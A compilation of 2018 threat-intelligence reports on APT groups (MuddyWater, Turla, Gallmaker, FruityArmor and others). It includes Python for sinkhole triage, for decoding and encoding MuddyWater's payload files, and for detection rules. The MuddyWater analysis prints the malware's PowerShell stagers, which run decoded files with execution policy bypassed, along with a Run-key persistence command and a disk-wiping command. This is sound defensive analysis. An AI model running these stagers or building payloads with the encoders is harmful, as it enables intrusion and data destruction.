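from datetime import date

MAX_TAGS = 4  # the post drops any IP that hit more than four campaign tags
# Our heuristic (assumed) for "IP addresses that belong to an ADSL connection"
CONSUMER_MARKERS = ("adsl", "dsl", "dyn", "pool", "dhcp")


def tags_per_ip(entries):
    """Map each IP to the set of campaign tags whose sinkholes it contacted."""
    tags = defaultdict(set)
    for ip, tag, _seen, _rdns in entries:
        tags[ip].add(tag)
    return tags


def tag_histogram(entries):
    """Bucket IPs by the number of tags hit, in the shape of the table above."""
    hist = defaultdict(int)
    for ip_tags in tags_per_ip(entries).values():
        n = len(ip_tags)
        hist[str(n) if n <= MAX_TAGS else ">4"] += 1
    return dict(hist)


def pdns_confirms(pdns, ip, hostname, when):
    """True if passive DNS saw hostname resolving to ip on the given date."""
    return any(host == hostname and first <= when <= last
               for host, first, last in pdns.get(ip, ()))


def triage(entries, pdns):
    """Apply the post's filters in order and return {ip: verdict}."""
    tags = tags_per_ip(entries)
    earliest = {}  # first sinkhole entry per IP
    for entry in entries:
        ip, seen = entry[0], entry[2]
        if ip not in earliest or seen < earliest[ip][2]:
            earliest[ip] = entry
    verdicts = {}
    for ip, (_ip, _tag, seen, rdns) in earliest.items():
        if len(tags[ip]) > MAX_TAGS:
            verdicts[ip] = "dropped: scanner (more than four tags)"
        elif not pdns_confirms(pdns, ip, rdns, seen):
            verdicts[ip] = "dropped: rDNS not confirmed by passive DNS at first sighting"
        elif any(m in rdns.lower() for m in CONSUMER_MARKERS):
            verdicts[ip] = "dropped: consumer (ADSL-style) connection"
        else:
            verdicts[ip] = "kept: candidate TP, tie to an organisation by hand"
    return verdicts


# Constructed sinkhole rows: (ip, campaign tag, first seen, rDNS at that time).
# Addresses are from the 203.0.113.0/24 documentation range; names are .test.
SINKHOLE = [
    ("203.0.113.10", "apt-a", date(2017, 3, 1), "mail.example-corp.test"),
    ("203.0.113.10", "apt-b", date(2017, 6, 9), "mail.example-corp.test"),
    ("203.0.113.20", "apt-a", date(2016, 1, 5), "h20.adsl.example-isp.test"),
    ("203.0.113.30", "apt-c", date(2018, 2, 2), "gw.example-uni.test"),
] + [("203.0.113.40", "apt-" + t, date(2015, 9, 9), "scan40.example.test")
     for t in "abcde"]

# Constructed passive-DNS view: ip -> [(hostname, first seen, last seen)].
PASSIVE_DNS = {
    "203.0.113.10": [("mail.example-corp.test", date(2016, 1, 1), date(2018, 9, 1))],
    "203.0.113.20": [("h20.adsl.example-isp.test", date(2015, 1, 1), date(2018, 9, 1))],
    "203.0.113.30": [("gw.example-uni.test", date(2018, 5, 1), date(2018, 9, 1))],
    "203.0.113.40": [("scan40.example.test", date(2015, 1, 1), date(2018, 9, 1))],
}

if __name__ == "__main__":
    print(tag_histogram(SINKHOLE))
    for ip, verdict in triage(SINKHOLE, PASSIVE_DNS).items():
        print(ip, verdict)
```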

We also checked our APT reports for targets in the Netherlands and added these results to the review.

Using the methods described above, we found the following APTs that are or have been active in the Netherlands:

BlackOasis is an APT group we have been tracking since May 2016. It uses the commercially available FinFisher malware made by Gamma International and sold to law enforcement agencies (LEAs) and nation states. BlackOasis differentiates itself from other APT-groups by using a vast amount of 0-days: at least five since 2015. Victims are mostly found in Middle Eastern countries, where the group is particularly interested in politics. We have also seen it targeting members of the United Nations and regional news correspondents. Recently we have seen a shift in focus towards other countries such as Russia, the UK and now also the Netherlands. Its Dutch victims fit into its shift of interest.

Sofacy, also known as Pawn Storm, Fancy Bear and many other names, is an active APT group that we have followed since 2011. It is known for using spear phishing emails to infect targets and for the active deployment of 0-days. In 2015, Trend Micro researchers reported that the group had targeted the MH17 investigation team. Last year, the Volkskrant published an article alleging it tried to infect several Dutch Ministries. Then there is the October 4, 2018 news of four alleged Sofacy members having been caught in April 2018 trying to hack the OPWC. Even though we cannot confirm these last two incidents, since we are not involved, we have observed several targets in the Netherlands infected with Sofacy. Interestingly, we observe fewer deployments of Xagent (one of Sofacy’s modules) after April 2018. Although one new Xagent deployment was noted in August 2018, it seems that the group pushed fewer, and then only new, deployments from April through June 2018.

Hades is the name given to the group held responsible for the Olympic Destroyer malware that was found targeting the 2018 Winter Olympic Games in South Korea. Our initial thought was that the malware was related to the Lazarus group, because several of our Yara rules had 100% matches with the malware. However, after careful research we found many false flags that pointed to different APT groups. A few months later, in May 2018 (not long after the OPWC incident took place), we found that Hades had returned and was now targeting financial institutions and chemical threat prevention laboratories. Given this shift of interest, it is no surprise that entities in the Netherlands were targeted as well.

Buhtrap is one of the groups that targets financial institutions with the ultimate goal of stealing money. Its tools, techniques and processes (TTPs) don’t differ extensively from those of traditional APT groups. Buhtrap is one of those (Carbanak and Tyupkin are others) that started by infecting financial institutions in Russia and Ukraine, but after a while shifted its focus to other parts of the world. We found Buhtrap activity in the Netherlands in 2017.

The Lamberts
In March 2017, WikiLeaks published online a series of documents that they call “Vault 7”. Some of these documents feature malware that resembles that used by the Lamberts, a toolkit that has been used for several years, with most of its activity occurring in 2013 and 2014. One of The Lamberts’ variants we have been investigating is the “Green Lamberts”. We were surprised to see quite a few infections in the Netherlands, when the majority of attacks target Iran. We do not have any insight into the profile of the victims located in the Netherlands. Nevertheless, the fact that Lamberts is active in the Netherlands shows a possible shift in focus, and reminds us that for APT groups, borders do not exist.

Turla, also known as Uroboros, is a very active APT group, believed to be connected to many high-profile incidents such as the US Central Command attack in 2008 and the breach of RUAG (a Swiss military contractor). Other Turla targets include ministries and governmental organizations. Given all this, the Netherlands is a logical target for the Turla group. In fact, we would have been surprised not to have found any Turla infections in the Netherlands.

Gatak, which also goes by the names of Stegoloader and GOLD, is a group that engages in data theft using watering hole attacks. It has been active since at least 2015, and its main interest is in intellectual property. Even though the use of watering hole attacks means the group does not have full control over who it infects, it has been able to hit a couple of high profile targets. In this case, our sinkhole database enabled us to determine that one of those was a high profile target in the Netherlands.

Putter Panda
In 2015, the Dutch chip maker, ASML was allegedly breached by Putter Panda. ASML acknowledged the breach and stated that one file was stolen. No further details are publicly available, although there was an episode of the TV program “KRO reporter“, partially dedicated to the breach. ASML is one of relatively few high-tech companies in the Netherlands. The fact that it has been breached is a clear sign that foreign threat actors are aware of and interested in industrial espionage in the Netherlands.

Animal Farm
Animal Farm is a group that has been active since at least 2009. A relatively advanced threat actor, it has been targeting a variety of organizations over the past years. Victims include governmental organizations, military contractors, activists and journalists. Even though the group is mainly focused on French speaking countries, we still found a few infections in the Netherlands.

Although our visibility of threat actor activity in the Netherlands is incomplete, the results are nevertheless surprising. Some groups we did not expect to see appear to be active in the country (such as the Lamberts). However, upon further thought, and especially when looking at potential targets located in the Netherlands and comparing this with the interests of some of the APT groups, their activity in the Netherlands makes sense.

The presence of both expected and unexpected threat actors is a good argument for organizations staying informed of the latest developments in cyberspace, particularly through threat intelligence reports. Because if you know what APT groups are up to, which organisations they target and what TTPs they use, you can implement the protection you need to stay one step ahead of them.

Such precautions are important, because one of the most stunning findings from the review of sinkhole databases was the number of organizations infected using “ordinary cybercrime malware”. We saw infections among airlines, airports and other major companies (although it should be noted that this happens in other countries as well, not just in the Netherlands). It demonstrates again that it is not so difficult for (APT) groups to breach valuable targets and that basic cyber hygiene is important for everybody.

As a final note, one should always be careful about deriving hard conclusions from APT findings, particularly in terms of attribution. For example, even though we saw Olympic Destroyer malware being used to target chemical threat prevention laboratories shortly after the OPWC incident, this is not conclusive evidence that the groups behind these attacks are the same, or even related. However, using this fact to monitor your network for the presence of Olympic Destroyer malware if you think you might be a potential Sofacy target – and vice versa – seems like a good approach.

MuddyWater expands operations

13.1.0218 Kaspersky APT

MuddyWater is a relatively new APT that surfaced in 2017. It has focused mainly on governmental targets in Iraq and Saudi Arabia, according to past telemetry. However, the group behind MuddyWater has been known to target other countries in the Middle East, Europe and the US. We recently noticed a large number of spear phishing documents that appear to be targeting government bodies, military entities, telcos and educational institutions in Jordan, Turkey, Azerbaijan and Pakistan, in addition to the continuous targeting of Iraq and Saudi Arabia; other victims were also detected in Mali, Austria, Russia, Iran and Bahrain. These new documents have appeared throughout 2018 and escalated from May onwards. The attacks are still ongoing.

The new spear-phishing docs used by MuddyWater rely on social engineering to persuade users to enable macros. The attackers rely on a range of compromised hosts to deliver their attacks. In the advanced stages of this research, we were able not only to observe additional files and tools from the attackers’ arsenal but also some OPSEC mistakes made by the attackers.

Previous related research:

Decoy images by country

• The Hashemite Kingdom of Jordan, Ministry of Justice (mwjo.doc)
• DAMAMAX.doc
• Turkey’s General Directorate of Security
• Turkey’s Directorate General of Coastal Safety
• Turkey’s General Directorate of Security (Onemli Rapor.doc)
• Turkey’s Ministry of the Interior (Early election.doc)
• Saudi Arabia: document signed by the Major General Pilot, commander of the Saudi Royal Air Force
• KSA King Saud University (KSU)
• İnkiºaf üçün görüº.doc (meeting for development)
• Iraqi Ministry of Foreign Affairs
• Government of Iraq, the Treasury of the Council of Ministers
• ECP.doc
• National Assembly of Pakistan.doc
• President.doc, E-government of Afghanistan

Technical details
Below is a description of the malware extraction and execution flow, starting from the initial infection vector, running VBA code via a macro and then dropping the PowerShell code that establishes command-center communications, sends victim system information and then receives commands supported by the malware.

The initial infection vector
The initial infection starts with macro-enabled Office 97-2003 Word files whose macros are usually password-protected to hinder static analysis.

Malicious obfuscated VBA code is executed when the macro is first enabled. In some cases, the malicious macro is also executed when the user activates a fake text box.

The macro payload analysis, dropped files and registry keys
The macro payload, which is Base64 encoded, does the following:

Drops two or three files into the “ProgramData” folder. The dropped files are either in the root of the “ProgramData” folder or in a subdirectory. The file names may vary from one version of the malware to another.

Adds a registry entry in the current user’s RUN key (HKCU) for later execution when the user next logs in. In some cases, the macro spawns the malicious payload/process instantly without waiting for the next time the user logs in. The registry keys and executables may vary from one version of the malware to another.
Example registry value data: c:\windows\system32\rundll32.exe advpack.dll,LaunchINFSection C:\ProgramData\EventManager.logs,Defender,1,

The next time the user logs in, the dropped payload will be executed. The executables have been chosen specifically for bypassing whitelisting solutions since they are all from Microsoft and very likely whitelisted. Regardless of the file extensions, the files dropped by the macro are EITHER INF, SCT and text files OR VBS and text files.

Case 1: INF, SCT and text files dropped by the macro
INF is launched via the advpack.dll “LaunchINFSection” function.
INF registers the SCT file (scriptlet file) via scrobj.dll (Microsoft Scriptlet library).
Via WMI (winmgmt), the JavaScript or VBscript code in the SCT file spawns a PowerShell one-liner which finally consumes the text file.
powershell.exe -exec Bypass -c $s=(get-content C:\\ProgramData\\WindowsDefenderService.ini);$d = @();$v = 0;$c = 0;while($c -ne $s.length){$v=($v*52)+([Int32][char]$s[$c]-40);if((($c+1)%3) -eq 0){while($v -ne 0){$vv=$v%256;if($vv -gt 0){$d+=[char][Int32]$vv}$v=[Int32]($v/256)}}$c+=1;};[array]::Reverse($d);iex([String]::Join('',$d));

PowerShell one-liner

Encoded text file

Execution flow:

Case 2: VBS and text files dropped by the macro
The VBS file decodes itself and calls mshta.exe, passing on one line of VBScript code to it, which in turn spawns a PowerShell one-liner which finally consumes the text file (usually Base64-encoded text).

powershell.exe -w 1 -exec Bypass -nologo -noprofile -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\ProgramData\ZIPSDK\ProjectConfManagerNT.ini))));

PowerShell one-liner

Encoded text file

Execution flow:
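The two text-file encodings used in Case 1 and Case 2 can be reproduced offline so that a dropped .ini file can be decoded for analysis without running the malware. The following Python is an added example, not code from the page or from Kaspersky: it reimplements the Case 1 one-liner’s decoding loop step for step (emulating the half-to-even rounding of PowerShell’s [Int32] cast of a double), implements the Case 2 Base64/UTF-16LE decoding, and adds our own encoders, which are assumptions used only to construct test samples.

```python
import base64

# Parameters of the Case 1 text-file encoding, read off the page's one-liner:
# each character is a base-52 digit (ord(ch) - 40), three digits make one
# integer, the integer is split into bytes low-order first, zero bytes are
# skipped and the collected bytes are reversed at the end.
DIGIT_BASE = 52
DIGIT_OFFSET = 40


def _ps_int32(x: float) -> int:
    """Emulate PowerShell's [Int32] cast of a double, which rounds half to
    even rather than truncating. For printable-ASCII payloads (every byte
    below 128) this equals floor division, so the malware decodes cleanly."""
    return int(round(x))


def decode_case1(text: str) -> bytes:
    """Decode a Case 1 text file, step for step as the one-liner does.
    A trailing group of fewer than three characters is silently dropped."""
    out = bytearray()
    v = 0
    for i, ch in enumerate(text):
        v = v * DIGIT_BASE + (ord(ch) - DIGIT_OFFSET)
        if (i + 1) % 3 == 0:
            while v != 0:
                low = v % 256
                if low > 0:
                    out.append(low)
                v = _ps_int32(v / 256)
    out.reverse()
    return bytes(out)


def encode_case1(payload: bytes) -> str:
    """Inverse of decode_case1 (our own helper for building test samples; the
    attackers' encoder is not on the page). Each pair of bytes of the
    reversed payload becomes one 16-bit value written as three base-52
    digits, most significant first. Restricted to bytes 1..127 so the
    rounding in the decoder can never alter a byte."""
    if any(b == 0 or b > 127 for b in payload):
        raise ValueError("only NUL-free printable-ASCII payloads round-trip")
    rev = payload[::-1]
    chars = []
    for j in range(0, len(rev), 2):
        high = rev[j + 1] if j + 1 < len(rev) else 0
        v = rev[j] + 256 * high
        digits = (v // DIGIT_BASE ** 2, (v // DIGIT_BASE) % DIGIT_BASE, v % DIGIT_BASE)
        chars.extend(chr(d + DIGIT_OFFSET) for d in digits)
    return "".join(chars)


def decode_case2(text: str) -> str:
    """Decode a Case 2 text file: Base64 wrapping a UTF-16LE script, which is
    what [Convert]::FromBase64String + Encoding.Unicode.GetString consume."""
    return base64.b64decode(text).decode("utf-16-le")


def encode_case2(script: str) -> str:
    """Inverse of decode_case2, for constructing samples."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed stand-ins for the dropped .ini files (not real samples).
SAMPLE_STAGE = "Write-Output 'constructed second stage'"
SAMPLE_CASE1 = encode_case1(SAMPLE_STAGE.encode("ascii"))
SAMPLE_CASE2 = encode_case2(SAMPLE_STAGE)

if __name__ == "__main__":
    print("case 1 file :", SAMPLE_CASE1)
    print("case 1 stage:", decode_case1(SAMPLE_CASE1).decode("ascii"))
    print("case 2 stage:", decode_case2(SAMPLE_CASE2))
```

To decode a real dropped file, read it as a single line and pass its text to the matching decoder; a Case 1 file whose length is not a multiple of three loses its tail exactly as the malware would.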

The PowerShell code
Whether PowerShell is invoked via WMI, wscript.exe, or mshta.exe, it executes one-liner PowerShell code (as outlined above) that reads the encoded text file dropped in ProgramData and then decodes it. The resulting code has multiple layers of obfuscation.

The first thing the PowerShell code does is disable Office “Macro Warnings” and “Protected View”. This is to ensure future attacks don’t require user interaction. It also allows macro code to access internal VBA objects for stealthier macro code execution in future attacks.

Next, it checks the running processes against a list of hard-coded process names; if any are found, the machine is forcefully rebooted. The names are linked to various tools used by malware researchers.


Blacklisted process names in the malware

In some cases, it calculates the checksum of each running process name, and if it matches any hard-coded checksums, it causes a BSOD via the ntdll.dll “NtRaiseHardError” function.

CnC communication
A URL is selected at random from a long list of embedded URLs held in an array named $dragon_middle. The selected URL is subsequently used for communication with the CnC server. If it can’t send data to the chosen CnC URL, it tries to obtain another random URL from $middle_dragon, then sleeps from one to 30 seconds and loops again.

Victim system reconnaissance
The code then tries to obtain the victim’s public IP via “https://api.ipify.org/”.

The public IP is then POSTed along with OS Version, Internal IP, Machine Name, Domain Name, UserName after being encrypted to the previously chosen URL to register a new victim. This allows the attackers to accept or reject victims depending on their IPs, countries, geolocations, target enterprises, etc. Depending on the response from the attacker’s CnC, the victim is assigned an ID $sysid. This ID is sent to the CnC with each request for commands to execute.

Supported commands
“upload“, “screenshot“, “Excel“, “Outlook“, “risk“, “reboot“, “shutdown“, “clean“. These commands vary from one version to another.

The “screenshot” command takes a screenshot that is saved as a .PNG file in “ProgramData“.
The “Excel” command receives another stage of the PowerShell code, saves it in “c:\programdata\a.ps1” and then asks Excel to execute this PowerShell script via DDE.
The “Outlook” command receives another stage of the PowerShell code, saves it in “c:\programdata\a.ps1” and then asks Outlook via COM, via MSHTA.exe, to execute it.
The “risk” command receives another stage of the PowerShell code, saves it in “c:\programdata\a.ps1” and then asks Explorer.exe via COM interaction to execute it.
The “upload” command downloads files from the CnC and saves them locally in “C:\ProgramData“.
The “clean” command destroys the victim’s disk drives C, D, E, F and then reboots.
The “reboot” and “shutdown” commands immediately reboot and shut down the victim’s machine.
In one version of the malware, the code checks if the “ProgramData” folder has folders or files with the keywords “Kasper“, “Panda“, or “ESET“.


Most victims of MuddyWater were found in Jordan, Turkey, Iraq, Pakistan, Saudi Arabia, Afghanistan and Azerbaijan. Other victims were also recorded in Russia, Iran, Bahrain, Austria and Mali. The malicious decoy documents used in the attacks suggest they are geopolitically motivated, targeting sensitive personnel and organizations.

Attacker deception and attribution
The deobfuscated PowerShell code used by the MuddyWater group resembles previously seen PowerShell scripts that most likely served as prototypes. Multiple documents used in the attacks also contain embedded paths from their authors’ machines. These paths are embedded by Office under various circumstances, for instance, when somebody adds a binary object (an OLE control, e.g. text box or command button) into a Word document. The paths discovered are:

• C:\Users\leo\AppData\Local\Temp\Word8.0\MSForms.exd
• C:\Users\poopak\AppData\Local\Temp\Word8.0\MSForms.exd
• C:\Users\Vendetta\AppData\Local\Temp\Word8.0\MSForms.exd
• C:\Users\Turk\AppData\Local\Temp\Word8.0\MSForms.exd

Leo, Poopak, Vendetta and Turk are the usernames of those creating the documents or the templates on which they are based. Turk could point to a person of Turkish origin. Poopak is a Persian girl’s name or might suggest the authors are not entirely happy with “Pak”, which could be short for Pakistan. Leo could be one of the attacker’s names. We also don’t rule out the possibility of false flags, with the attackers using random usernames to confuse researchers.

In multiple instances, we have also found Chinese text inside the samples, possibly indicating the reuse of code by the attackers.


Chinese text found in PowerShell code in multiple samples

Unable to connect to the URL, please wait for the dragon…
Unable to access local computer register
Task Scheduler access denied

Translation of Chinese text

We have also noticed that for some samples, e.g. 5a42a712e3b3cfa1db32d9e3d832f8f1, the PowerShell code had only three CnC URLs, which leads us to believe that most of the CnC URLs in $dragon_middle found in other samples could actually be ‘noise’ to distract researchers or trigger false positives.


Recommendations for organizations
Effective protection from targeted attacks focuses on advanced detective, preventive and investigative capabilities via solutions and training, allowing an organization to control any activities on their network or suspicious files on user systems.

The best way to prevent attackers from finding and leveraging security holes is to eliminate the holes altogether, including those related to improper system configurations or errors in proprietary applications. Organizations are also recommended to implement the following steps for an enhanced level of protection at their premises.

Use PowerShell Constrained Language Mode, since the malware relies on IEX, Add-Type, and New-Object.
Lock the PowerShell execution policy: it must be set to “AllSigned” via GPO.
Deploy a whitelisting solution that prevents certain parent-child process execution hierarchies.
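The parent-child hierarchies and command-line patterns in the execution chains above can be turned into process-creation detections. The following Python is an added example, not code from the page or from Kaspersky, run over constructed telemetry; the parent-image names (WmiPrvSE.exe as the WMI host), the regsvr32 form of the scrobj.dll scriptlet registration, the dropped-file name stage.sct and the event field names are assumptions.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (constructed layout; field names are ours)."""
    parent: str
    image: str
    cmdline: str


# Parents that, in the execution chains above, hand off to powershell.exe and
# that should not be doing so on an ordinary workstation. WmiPrvSE.exe is our
# assumption of how "via WMI (winmgmt)" shows up in process telemetry.
SUSPICIOUS_PS_PARENTS = {
    "mshta.exe", "wscript.exe", "cscript.exe", "wmiprvse.exe",
    "excel.exe", "outlook.exe", "winword.exe",
}

# The Run-key value on the page: rundll32 advpack.dll,LaunchINFSection <inf>
INF_LAUNCH = re.compile(r"advpack\.dll\s*,\s*LaunchINFSection", re.I)
# Scriptlet registration through scrobj.dll
SCROBJ = re.compile(r"scrobj\.dll", re.I)
# PowerShell pulling its encoded stage from ProgramData and evaluating it
PS_BYPASS = re.compile(r"-exec(?:utionpolicy)?\s+bypass", re.I)
PS_EVAL = re.compile(r"\biex\b|invoke-expression|FromBase64String", re.I)
PS_PROGRAMDATA = re.compile(r"get-content\s+c:\\{1,2}programdata", re.I)


def classify(ev):
    """Return the names of every rule the event matches (empty if benign)."""
    hits = []
    image, parent, cmd = ev.image.lower(), ev.parent.lower(), ev.cmdline
    if image == "rundll32.exe" and INF_LAUNCH.search(cmd):
        hits.append("inf_launch_via_advpack")
    if SCROBJ.search(cmd) and ".sct" in cmd.lower():
        hits.append("sct_registered_via_scrobj")
    if image == "powershell.exe":
        if parent in SUSPICIOUS_PS_PARENTS:
            hits.append("powershell_from_script_host_or_office")
        if all(p.search(cmd) for p in (PS_BYPASS, PS_EVAL, PS_PROGRAMDATA)):
            hits.append("powershell_programdata_stager")
    return hits


def detect(events):
    """Run every rule over a list of events; returns (event, rule) pairs."""
    return [(ev, rule) for ev in events for rule in classify(ev)]


# Constructed telemetry modelled on the page's chains (no real log data).
# The regsvr32 command-line form of the SCT registration is assumed; the page
# only says the INF registers the scriptlet via scrobj.dll.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "rundll32.exe",
              r"c:\windows\system32\rundll32.exe advpack.dll,LaunchINFSection "
              r"C:\ProgramData\EventManager.logs,Defender,1,"),
    ProcEvent("rundll32.exe", "regsvr32.exe",
              r"regsvr32.exe /s /n /u /i:C:\ProgramData\stage.sct scrobj.dll"),
    ProcEvent("wmiprvse.exe", "powershell.exe",
              r"powershell.exe -exec Bypass -c $s=(get-content "
              r"C:\\ProgramData\\WindowsDefenderService.ini);...;"
              r"iex([String]::Join('',$d));"),
    ProcEvent("mshta.exe", "powershell.exe",
              r"powershell.exe -w 1 -exec Bypass -nologo -noprofile -c "
              r"iex([System.Text.Encoding]::Unicode.GetString("
              r"[System.Convert]::FromBase64String((get-content "
              r"C:\ProgramData\ZIPSDK\ProjectConfManagerNT.ini))));"),
    ProcEvent("explorer.exe", "powershell.exe", "powershell.exe -noprofile"),
    ProcEvent("services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
]

if __name__ == "__main__":
    for ev, rule in detect(SAMPLE_EVENTS):
        print(f"{rule:40s} {ev.parent} -> {ev.image}")
```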
The MuddyWater group has carried out a large number of attacks and demonstrated advanced social engineering, in addition to the active development of attacks, infrastructure and the use of new methods and techniques. The attackers are actively improving their toolkit in an effort to minimize their exposure to security products and services. Kaspersky Lab expects these types of attacks to intensify in the near future.

In order to protect your company from malware, Kaspersky Lab researchers recommend implementing the following measures:

Educate generic staff to be able to distinguish malicious behavior like phishing links.
Educate information security staff to have full configuration, investigative and hunting abilities.
Use a proven corporate-grade security solution in combination with anti-targeted attack solutions capable of detecting attacks by analyzing network anomalies.
Provide security staff with access to the latest threat intelligence data, which will arm them with helpful tools for targeted attack prevention and discovery, such as indicators of compromise and YARA rules.
Make sure enterprise-grade patch management processes are well established and executed.
High-profile organizations should have elevated levels of cybersecurity; attacks against them are inevitable and are unlikely to ever cease.

Additional information
In the advanced stages of this research, we were able not only to observe additional files and tools from the attackers’ arsenal but also some OPSEC mistakes made by the attackers.

Further details about the attackers’ arsenal, additional indicators of compromise, YARA rules and attribution information is available to customers of Kaspersky Intelligence Reporting. Contact: intelreports@kaspersky.com

Indicators of compromise

File names

Domains, URLs and IP addresses

New Gallmaker APT group eschews malware in cyber espionage campaigns
11.10.2018 securityaffairs

A previously unknown cyber espionage group, tracked as Gallmaker, has been targeting entities in the government, military and defense sectors since at least 2017.
A new cyber espionage group tracked as Gallmaker appeared in the threat landscape. According to researchers from Symantec, who first spotted the threat actor, the group has launched attacks on several overseas embassies of an unnamed Eastern European country, and military and defense organizations in the Middle East.

Gallmaker is a politically motivated APT group that focused its surgical operations on the government, military or defense sectors.

Gallmaker has been active since at least December 2017; researchers observed a spike in its operations in April, and the most recent attacks were uncovered in June.

Gallmaker activity

The experts speculate that the threat actor is nation-state; it is interesting to note that the APT relies entirely on code scraped from the public internet.

“This group eschews custom malware and uses living off the land (LotL) tactics and publicly available hack tools to carry out activities that bear all the hallmarks of a cyber espionage campaign,” reads the analysis published by Symantec.

“The most interesting aspect of Gallmaker’s approach is that the group doesn’t use malware in its operations. Rather, the attack activity we observed is carried out exclusively using LotL tactics and publicly available hack tools.”

Gallmaker uses spear phishing messages carrying a weaponized Office document that uses the Dynamic Data Exchange (DDE) protocol to execute commands in the memory of the targeted device.

“These lure documents use titles with government, military, and diplomatic themes, and the file names are written in English or Cyrillic languages. These documents are not very sophisticated, but evidence of infections shows that they’re effective.” continues Symantec.

“By running solely in memory, the attackers avoid leaving artifacts on disk, which makes their activities difficult to detect.”

Once the attackers gain access to a target machine, they use various tools including the reverse_tcp reverse shell from Metasploit, the WindowsRoamingToolsTask PowerShell scheduler, the WinZip console, and an open source library named Rex PowerShell, which helps create PowerShell scripts for Metasploit exploits.

Experts discovered that Gallmaker is using three primary IP addresses for its C&C infrastructure; they also noticed that the attackers delete some of their tools from compromised machines once the attack is complete, likely to hide traces of their activity.

“The fact that Gallmaker appears to rely exclusively on LotL tactics and publicly available hack tools makes its activities extremely hard to detect. We have written extensively about the increasing use of LotL tools and publicly available hack tools by cyber criminals.” concluded Symantec. “One of the primary reasons for the increased popularity of these kinds of tools is to avoid detection; attackers are hoping to “hide in plain sight”, with their malicious activity hidden in a sea of legitimate processes.”

CVE-2018-8453 Zero-Day flaw exploited by FruityArmor APT in attacks aimed at Middle East
10.10.2018 securityaffairs

A Windows zero-day flaw addressed by Microsoft with its latest Patch Tuesday updates is exploited by an APT group in attacks aimed at entities in the Middle East.
The Windows zero-day vulnerability tracked as CVE-2018-8453 is a privilege escalation flaw that was exploited by an APT group in attacks against entities in the Middle East.

The flaw, tracked as CVE-2018-8453, exists in the way the Win32k component of Windows handles objects in memory.

The flaw, discovered by experts from Kaspersky Lab, could be exploited by an authenticated attacker to take control of an affected system.

CVE-2018-8453 Win 0day

Kaspersky Lab reported the vulnerability to Microsoft on August 17, roughly two months ago.

Kaspersky revealed that the CVE-2018-8453 vulnerability has been exploited by the APT group tracked as FruityArmor, a cyber-espionage group that was first observed in 2016 while targeting activists, researchers, and individuals related to government organizations.

Experts believe FruityArmor’s activity has been slowly increasing during the last two years.

The zero-day exploit was included in a malware installer used by the group to escalate privileges on the target machine and to gain persistence.

The final payload dropped by the malware was a sophisticated implant used by the attackers for persistent access to the victims’ machines.”

“In August 2018 our Automatic Exploit Prevention (AEP) systems detected an attempt to exploit a vulnerability in Microsoft Windows operating system. Further analysis into this case led us to uncover a zero-day vulnerability in win32k.sys.” reads the report published by Kaspersky.

“The exploit was executed by the first stage of a malware installer to get necessary privileges for persistence on the victim’s system. The code of the exploit is of high quality and written with the aim of reliably exploiting as many different MS Windows builds as possible, including MS Windows 10 RS4.”

The zero-day resembles an older vulnerability, CVE-2017-0263, that Microsoft fixed in May 2017 and that had been exploited by the Russia-linked cyberespionage group tracked as APT28.

The zero-day exploit was used in targeted attacks against less than a dozen entities located in the Middle East.

“So far, this campaign has been extremely targeted, affecting a very low number of victims in the Middle East region, probably persons of interest for the attackers. However, the victimology is not clear, especially with such a small number of victims involved.” continues the report.

The attribution was possible due to the detection of a PowerShell backdoor that has previously been exclusively used by the FruityArmor APT. Experts also confirmed an overlap in the C2 infrastructure between the last campaign and previous attacks attributed to the group.

Further technical details are reported by Kaspersky experts in their analysis.

Shedding Skin – Turla’s Fresh Faces
8.10.2018 Kaspersky

Turla, also known as Venomous Bear, Waterbug, and Uroboros, may be best known for what was at the time an “ultra complex” snake rootkit focused on NATO-related targets, but their malware set and activity is much broader. Our current focus is on more recent and upcoming activity from this APT, which brings an interesting mix of old code, new code, and new speculations as to where they will strike next and what they will shed.

Much of our 2018 research focused on Turla’s KopiLuwak javascript backdoor, new variants of the Carbon framework and meterpreter delivery techniques. Also interesting was Mosquito’s changing delivery techniques, customized PoshSec-Mod open-source powershell use, and borrowed injector code. We tied some of this activity together with infrastructure and data points from WhiteBear and Mosquito infrastructure and activity in 2017 and 2018.

For the first time, our KopiLuwak research identified targets and delivery techniques, bringing more accuracy and reliability to the discussion. Also interesting is a review of Turla scripting artefacts leading to newer efforts like KopiLuwak, tracing from older scripting development efforts in WhiteAtlas and WhiteBear. And we find 2018 KopiLuwak delivery techniques that unexpectedly matched Zebrocy spearphishing techniques, also for the first time.

Also highly interesting and unusual was the MiTM techniques delivering Mosquito backdoors. In all likelihood, Turla delivered a physical presence of some sort within Wifi range of targets. Download sessions with Adobe’s website were intercepted and injected to deliver Mosquito trojanized installers. This sort of hypothesis is supported by Mosquito installers’ consistent wifi credential theft. Meanwhile, injection and delivery techniques are undergoing changes in 2018 with reflective loaders and code enhancements. We expect to see more Mosquito activity into 2019.

And finally, we discuss the Carbon framework, tying together the older, elegant, and functional codebase sometimes called “Snake lite” with ongoing efforts to selectively monitor high value targets. It appears that the backdoor is pushed with meterpreter now. And, as we see code modifications and deployment in 2018, we predict more development work on this matured codebase along with selective deployment to continue into 2019.

Essentially, we are discussing ongoing activity revolving around several malware families:

KopiLuwak and IcedCoffee

Technical Rattle
Turla's Shifting to Scripting
KopiLuwak and IcedCoffee, WhiteBear, and WhiteAtlas
Since at least 2015 Turla has leveraged Javascript, powershell, and wsh in a number of ways, including in their malware dropper/installation operations as well as for implementing complete backdoors. The White Atlas framework often utilized a small Javascript script to execute the malware dropper payload after it was decrypted by the VBA macro code, then to delete the dropper afterwards. A much more advanced and highly obfuscated Javascript script was utilized in White Atlas samples that dropped a Firefox extension backdoor developed by Turla, but again the script was responsible for the simple tasks of writing out the extension.json configuration file for the extension and deleting itself for cleanup purposes.

Turla’s first foray into full-fledged Javascript backdoors began with the usage of the IcedCoffee backdoor that we reported on in our private June 2016 “Ice Turla” report (available to customers of Kaspersky APT Intelligence Services), which led later to their more fully functional and complex, recently deployed, KopiLuwak backdoor. IcedCoffee was initially dropped by exploit-laden RTF documents, then later by macro-enabled Office documents. The macro code used to drop IcedCoffee was a slightly modified version of that found in White Atlas, which is consistent with the code sharing present in many Turla tools. A noteworthy change to the macro code was the addition of a simple web beacon that relayed basic information to Turla controlled servers upon execution of the macro, which not only helped profile the victim but also could be used to track the effectiveness of the attack.

